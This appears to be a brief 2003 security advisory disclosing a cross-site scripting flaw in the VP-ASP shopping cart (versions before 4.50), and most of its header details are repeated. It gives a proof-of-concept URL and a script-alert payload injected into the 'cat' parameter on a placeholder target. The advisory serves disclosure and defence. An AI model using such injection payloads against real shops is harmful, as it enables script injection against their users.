Advisory Name: Cross Site Scripting in VP-ASP
Release Date: December 05st, 2003
Application: VP-ASP
Version Affected: < 4.50
Platform: ASP
Severity: Low
Discover: Xnuxer Research Lab. (xnuxer (at) linux (dot) net [email concealed], xnuxer (at) yahoo (dot) com [email concealed])
Vendor URL: http://www.vp-asp.com
Reference: http://infosekuriti.com
Proof Of Concept:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]
Release Date: December 05st, 2003
Application: VP-ASP
Version Affected: < 4.50
Platform: ASP
Severity: Low
Discover: Xnuxer Research Lab. (xnuxer (at) linux (dot) net [email concealed], xnuxer (at) yahoo (dot) com [email concealed])
Vendor URL: http://www.vp-asp.com
Reference: http://infosekuriti.com
Proof Of Concept:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=[XSS Code]
Exploit Example:
http://target.com/shopping/shopdisplayproducts.asp?id=1&cat=<script>aler
t('test')</script>
_____________________________________________________________
Linux.Net -->Open Source to everyone
Powered by Linare Corporation
http://www.linare.com/
[ reply ]